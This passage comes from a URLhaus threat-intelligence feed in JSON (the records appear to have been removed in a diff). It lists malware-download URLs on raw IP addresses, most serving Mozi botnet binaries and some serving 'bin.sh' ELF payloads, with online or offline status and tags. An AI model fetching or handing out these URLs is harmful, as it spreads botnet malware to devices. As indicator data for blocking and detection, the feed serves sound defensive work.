UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961161","urlhaus_reference":"https://urlhaus.abuse.ch/url/961161/","url":"http://182.136.98.81:51996/Mozi.m","url_status":"offline","host":"182.136.98.81","date_added":"2021-01-14 18:04:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961160","urlhaus_reference":"https://urlhaus.abuse.ch/url/961160/","url":"http://125.47.250.69:36042/Mozi.m","url_status":"offline","host":"125.47.250.69","date_added":"2021-01-14 18:04:34 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961158","urlhaus_reference":"https://urlhaus.abuse.ch/url/961158/","url":"http://222.137.96.31:34350/Mozi.m","url_status":"offline","host":"222.137.96.31","date_added":"2021-01-14 18:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961159","urlhaus_reference":"https://urlhaus.abuse.ch/url/961159/","url":"http://223.130.29.204:53587/Mozi.m","url_status":"offline","host":"223.130.29.204","date_added":"2021-01-14 18:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961157","urlhaus_reference":"https://urlhaus.abuse.ch/url/961157/","url":"http://61.52.28.142:53444/Mozi.m","url_status":"online","host":"61.52.28.142","date_added":"2021-01-14 18:04:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} 
-{"id":"961155","urlhaus_reference":"https://urlhaus.abuse.ch/url/961155/","url":"http://120.85.254.107:58653/Mozi.m","url_status":"online","host":"120.85.254.107","date_added":"2021-01-14 18:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961156","urlhaus_reference":"https://urlhaus.abuse.ch/url/961156/","url":"http://202.164.139.218:50579/Mozi.m","url_status":"offline","host":"202.164.139.218","date_added":"2021-01-14 18:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961152","urlhaus_reference":"https://urlhaus.abuse.ch/url/961152/","url":"http://114.199.216.11:3553/Mozi.m","url_status":"offline","host":"114.199.216.11","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961153","urlhaus_reference":"https://urlhaus.abuse.ch/url/961153/","url":"http://112.241.208.20:35288/Mozi.a","url_status":"online","host":"112.241.208.20","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961154","urlhaus_reference":"https://urlhaus.abuse.ch/url/961154/","url":"http://186.33.104.10:46429/Mozi.m","url_status":"online","host":"186.33.104.10","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} -{"id":"961151","urlhaus_reference":"https://urlhaus.abuse.ch/url/961151/","url":"http://59.96.37.179:44575/Mozi.m","url_status":"offline","host":"59.96.37.179","date_added":"2021-01-14 18:04:06 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961149","urlhaus_reference":"https://urlhaus.abuse.ch/url/961149/","url":"http://125.42.236.165:43245/Mozi.m","url_status":"online","host":"125.42.236.165","date_added":"2021-01-14 18:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961150","urlhaus_reference":"https://urlhaus.abuse.ch/url/961150/","url":"http://117.242.211.165:50444/Mozi.m","url_status":"offline","host":"117.242.211.165","date_added":"2021-01-14 18:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} -{"id":"961144","urlhaus_reference":"https://urlhaus.abuse.ch/url/961144/","url":"http://115.63.134.203:51318/Mozi.m","url_status":"online","host":"115.63.134.203","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} -{"id":"961145","urlhaus_reference":"https://urlhaus.abuse.ch/url/961145/","url":"http://123.4.89.190:46221/Mozi.m","url_status":"online","host":"123.4.89.190","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961146","urlhaus_reference":"https://urlhaus.abuse.ch/url/961146/","url":"http://123.9.108.157:51430/Mozi.m","url_status":"online","host":"123.9.108.157","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961147","urlhaus_reference":"https://urlhaus.abuse.ch/url/961147/","url":"http://115.48.160.11:52028/Mozi.m","url_status":"online","host":"115.48.160.11","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961148","urlhaus_reference":"https://urlhaus.abuse.ch/url/961148/","url":"http://125.44.61.35:48291/Mozi.a","url_status":"online","host":"125.44.61.35","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961143","urlhaus_reference":"https://urlhaus.abuse.ch/url/961143/","url":"http://202.164.138.170:39613/Mozi.m","url_status":"offline","host":"202.164.138.170","date_added":"2021-01-14 18:04:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961142","urlhaus_reference":"https://urlhaus.abuse.ch/url/961142/","url":"http://219.154.108.170:34201/bin.sh","url_status":"online","host":"219.154.108.170","date_added":"2021-01-14 17:56:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961141","urlhaus_reference":"https://urlhaus.abuse.ch/url/961141/","url":"http://220.135.95.248:47095/Mozi.a","url_status":"online","host":"220.135.95.248","date_added":"2021-01-14 17:53:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961136","urlhaus_reference":"https://urlhaus.abuse.ch/url/961136/","url":"http://42.239.154.85:42004/Mozi.m","url_status":"online","host":"42.239.154.85","date_added":"2021-01-14 17:53:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961137","urlhaus_reference":"https://urlhaus.abuse.ch/url/961137/","url":"http://27.203.185.42:52058/Mozi.m","url_status":"online","host":"27.203.185.42","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961138","urlhaus_reference":"https://urlhaus.abuse.ch/url/961138/","url":"http://39.80.186.173:45432/Mozi.m","url_status":"online","host":"39.80.186.173","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961139","urlhaus_reference":"https://urlhaus.abuse.ch/url/961139/","url":"http://61.52.34.132:49891/Mozi.m","url_status":"online","host":"61.52.34.132","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961140","urlhaus_reference":"https://urlhaus.abuse.ch/url/961140/","url":"http://61.54.41.216:34334/Mozi.m","url_status":"online","host":"61.54.41.216","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961135","urlhaus_reference":"https://urlhaus.abuse.ch/url/961135/","url":"http://186.33.104.202:42886/Mozi.m","url_status":"online","host":"186.33.104.202","date_added":"2021-01-14 17:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961134","urlhaus_reference":"https://urlhaus.abuse.ch/url/961134/","url":"http://189.51.107.141:47096/Mozi.m","url_status":"offline","host":"189.51.107.141","date_added":"2021-01-14 17:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961132","urlhaus_reference":"https://urlhaus.abuse.ch/url/961132/","url":"http://182.126.81.19:48214/Mozi.a","url_status":"online","host":"182.126.81.19","date_added":"2021-01-14 17:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961133","urlhaus_reference":"https://urlhaus.abuse.ch/url/961133/","url":"http://186.33.122.192:40478/Mozi.m","url_status":"offline","host":"186.33.122.192","date_added":"2021-01-14 17:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961130","urlhaus_reference":"https://urlhaus.abuse.ch/url/961130/","url":"http://182.121.200.78:37771/Mozi.m","url_status":"online","host":"182.121.200.78","date_added":"2021-01-14 17:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961131","urlhaus_reference":"https://urlhaus.abuse.ch/url/961131/","url":"http://182.124.24.207:35513/Mozi.m","url_status":"online","host":"182.124.24.207","date_added":"2021-01-14 17:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961129","urlhaus_reference":"https://urlhaus.abuse.ch/url/961129/","url":"http://125.43.32.14:53382/Mozi.m","url_status":"online","host":"125.43.32.14","date_added":"2021-01-14 17:51:03 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961128","urlhaus_reference":"https://urlhaus.abuse.ch/url/961128/","url":"http://115.55.129.18:50336/Mozi.m","url_status":"online","host":"115.55.129.18","date_added":"2021-01-14 17:50:17 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961124","urlhaus_reference":"https://urlhaus.abuse.ch/url/961124/","url":"http://116.73.59.171:34233/Mozi.a","url_status":"offline","host":"116.73.59.171","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961125","urlhaus_reference":"https://urlhaus.abuse.ch/url/961125/","url":"http://117.208.132.85:38392/Mozi.m","url_status":"online","host":"117.208.132.85","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961126","urlhaus_reference":"https://urlhaus.abuse.ch/url/961126/","url":"http://117.222.173.218:52654/Mozi.m","url_status":"offline","host":"117.222.173.218","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961127","urlhaus_reference":"https://urlhaus.abuse.ch/url/961127/","url":"http://117.247.200.9:60203/Mozi.m","url_status":"offline","host":"117.247.200.9","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961123","urlhaus_reference":"https://urlhaus.abuse.ch/url/961123/","url":"http://120.85.187.191:48091/Mozi.a","url_status":"online","host":"120.85.187.191","date_added":"2021-01-14 17:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961122","urlhaus_reference":"https://urlhaus.abuse.ch/url/961122/","url":"http://111.241.105.88:40783/Mozi.m","url_status":"offline","host":"111.241.105.88","date_added":"2021-01-14 17:49:41 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961121","urlhaus_reference":"https://urlhaus.abuse.ch/url/961121/","url":"http://113.88.36.206:52015/Mozi.m","url_status":"online","host":"113.88.36.206","date_added":"2021-01-14 17:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961118","urlhaus_reference":"https://urlhaus.abuse.ch/url/961118/","url":"http://59.99.143.251:42987/Mozi.m","url_status":"offline","host":"59.99.143.251","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961119","urlhaus_reference":"https://urlhaus.abuse.ch/url/961119/","url":"http://59.94.180.106:53388/Mozi.m","url_status":"offline","host":"59.94.180.106","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961120","urlhaus_reference":"https://urlhaus.abuse.ch/url/961120/","url":"http://36.224.231.40:44124/Mozi.a","url_status":"online","host":"36.224.231.40","date_added":"2021-01-14 17:37:06 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961115","urlhaus_reference":"https://urlhaus.abuse.ch/url/961115/","url":"http://223.212.211.103:33802/Mozi.m","url_status":"online","host":"223.212.211.103","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961116","urlhaus_reference":"https://urlhaus.abuse.ch/url/961116/","url":"http://59.99.95.124:43806/Mozi.m","url_status":"offline","host":"59.99.95.124","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961117","urlhaus_reference":"https://urlhaus.abuse.ch/url/961117/","url":"http://59.97.169.13:52278/Mozi.m","url_status":"offline","host":"59.97.169.13","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961114","urlhaus_reference":"https://urlhaus.abuse.ch/url/961114/","url":"http://39.64.134.162:41202/Mozi.m","url_status":"online","host":"39.64.134.162","date_added":"2021-01-14 17:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961113","urlhaus_reference":"https://urlhaus.abuse.ch/url/961113/","url":"http://182.117.84.206:35756/Mozi.m","url_status":"online","host":"182.117.84.206","date_added":"2021-01-14 17:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961112","urlhaus_reference":"https://urlhaus.abuse.ch/url/961112/","url":"http://186.33.123.61:40569/Mozi.m","url_status":"online","host":"186.33.123.61","date_added":"2021-01-14 17:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961111","urlhaus_reference":"https://urlhaus.abuse.ch/url/961111/","url":"http://182.112.20.174:47645/Mozi.m","url_status":"online","host":"182.112.20.174","date_added":"2021-01-14 17:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961110","urlhaus_reference":"https://urlhaus.abuse.ch/url/961110/","url":"http://123.13.77.167:40023/Mozi.m","url_status":"online","host":"123.13.77.167","date_added":"2021-01-14 17:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961109","urlhaus_reference":"https://urlhaus.abuse.ch/url/961109/","url":"http://115.48.204.10:53402/Mozi.m","url_status":"online","host":"115.48.204.10","date_added":"2021-01-14 17:34:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961108","urlhaus_reference":"https://urlhaus.abuse.ch/url/961108/","url":"http://175.214.73.205:36316/bin.sh","url_status":"offline","host":"175.214.73.205","date_added":"2021-01-14 17:29:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961107","urlhaus_reference":"https://urlhaus.abuse.ch/url/961107/","url":"http://117.248.61.75:48105/bin.sh","url_status":"offline","host":"117.248.61.75","date_added":"2021-01-14 17:28:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961103","urlhaus_reference":"https://urlhaus.abuse.ch/url/961103/","url":"http://42.231.245.237:40017/Mozi.m","url_status":"online","host":"42.231.245.237","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961104","urlhaus_reference":"https://urlhaus.abuse.ch/url/961104/","url":"http://59.99.45.199:41906/Mozi.m","url_status":"offline","host":"59.99.45.199","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961105","urlhaus_reference":"https://urlhaus.abuse.ch/url/961105/","url":"http://42.237.48.61:38607/Mozi.m","url_status":"online","host":"42.237.48.61","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961106","urlhaus_reference":"https://urlhaus.abuse.ch/url/961106/","url":"http://59.93.23.63:59331/Mozi.m","url_status":"offline","host":"59.93.23.63","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961102","urlhaus_reference":"https://urlhaus.abuse.ch/url/961102/","url":"http://182.126.118.45:53932/Mozi.m","url_status":"online","host":"182.126.118.45","date_added":"2021-01-14 17:20:24 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961101","urlhaus_reference":"https://urlhaus.abuse.ch/url/961101/","url":"http://42.230.152.22:58385/Mozi.m","url_status":"online","host":"42.230.152.22","date_added":"2021-01-14 17:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961099","urlhaus_reference":"https://urlhaus.abuse.ch/url/961099/","url":"http://186.33.105.12:57010/Mozi.m","url_status":"online","host":"186.33.105.12","date_added":"2021-01-14 17:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961100","urlhaus_reference":"https://urlhaus.abuse.ch/url/961100/","url":"http://222.137.33.111:59715/Mozi.m","url_status":"online","host":"222.137.33.111","date_added":"2021-01-14 17:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961094","urlhaus_reference":"https://urlhaus.abuse.ch/url/961094/","url":"http://42.231.120.221:57052/Mozi.m","url_status":"online","host":"42.231.120.221","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961095","urlhaus_reference":"https://urlhaus.abuse.ch/url/961095/","url":"http://182.117.11.37:60550/Mozi.m","url_status":"online","host":"182.117.11.37","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961096","urlhaus_reference":"https://urlhaus.abuse.ch/url/961096/","url":"http://186.33.104.144:39684/Mozi.m","url_status":"offline","host":"186.33.104.144","date_added":"2021-01-14 17:20:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961097","urlhaus_reference":"https://urlhaus.abuse.ch/url/961097/","url":"http://122.188.41.69:43593/Mozi.a","url_status":"online","host":"122.188.41.69","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961098","urlhaus_reference":"https://urlhaus.abuse.ch/url/961098/","url":"http://125.42.207.154:36066/Mozi.m","url_status":"offline","host":"125.42.207.154","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961093","urlhaus_reference":"https://urlhaus.abuse.ch/url/961093/","url":"http://115.230.82.41:35006/Mozi.m","url_status":"online","host":"115.230.82.41","date_added":"2021-01-14 17:19:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961091","urlhaus_reference":"https://urlhaus.abuse.ch/url/961091/","url":"http://113.90.177.157:38184/Mozi.m","url_status":"online","host":"113.90.177.157","date_added":"2021-01-14 17:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961092","urlhaus_reference":"https://urlhaus.abuse.ch/url/961092/","url":"http://112.228.183.24:59027/Mozi.m","url_status":"online","host":"112.228.183.24","date_added":"2021-01-14 17:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961090","urlhaus_reference":"https://urlhaus.abuse.ch/url/961090/","url":"http://117.192.226.105:50639/Mozi.m","url_status":"offline","host":"117.192.226.105","date_added":"2021-01-14 17:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961086","urlhaus_reference":"https://urlhaus.abuse.ch/url/961086/","url":"http://115.54.242.73:33534/Mozi.a","url_status":"online","host":"115.54.242.73","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961087","urlhaus_reference":"https://urlhaus.abuse.ch/url/961087/","url":"http://115.54.208.19:36316/Mozi.m","url_status":"online","host":"115.54.208.19","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961088","urlhaus_reference":"https://urlhaus.abuse.ch/url/961088/","url":"http://115.97.18.154:47120/Mozi.m","url_status":"offline","host":"115.97.18.154","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961089","urlhaus_reference":"https://urlhaus.abuse.ch/url/961089/","url":"http://117.213.42.231:46287/Mozi.m","url_status":"offline","host":"117.213.42.231","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961085","urlhaus_reference":"https://urlhaus.abuse.ch/url/961085/","url":"http://42.236.149.218:39536/bin.sh","url_status":"online","host":"42.236.149.218","date_added":"2021-01-14 17:14:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961083","urlhaus_reference":"https://urlhaus.abuse.ch/url/961083/","url":"http://59.94.181.146:40689/Mozi.m","url_status":"offline","host":"59.94.181.146","date_added":"2021-01-14 17:07:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961084","urlhaus_reference":"https://urlhaus.abuse.ch/url/961084/","url":"http://58.249.83.3:51123/Mozi.m","url_status":"online","host":"58.249.83.3","date_added":"2021-01-14 17:07:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961082","urlhaus_reference":"https://urlhaus.abuse.ch/url/961082/","url":"http://49.77.198.90:52540/Mozi.a","url_status":"online","host":"49.77.198.90","date_added":"2021-01-14 17:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961081","urlhaus_reference":"https://urlhaus.abuse.ch/url/961081/","url":"http://59.96.27.213:56964/Mozi.m","url_status":"offline","host":"59.96.27.213","date_added":"2021-01-14 17:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961078","urlhaus_reference":"https://urlhaus.abuse.ch/url/961078/","url":"http://61.52.62.80:57120/Mozi.m","url_status":"online","host":"61.52.62.80","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
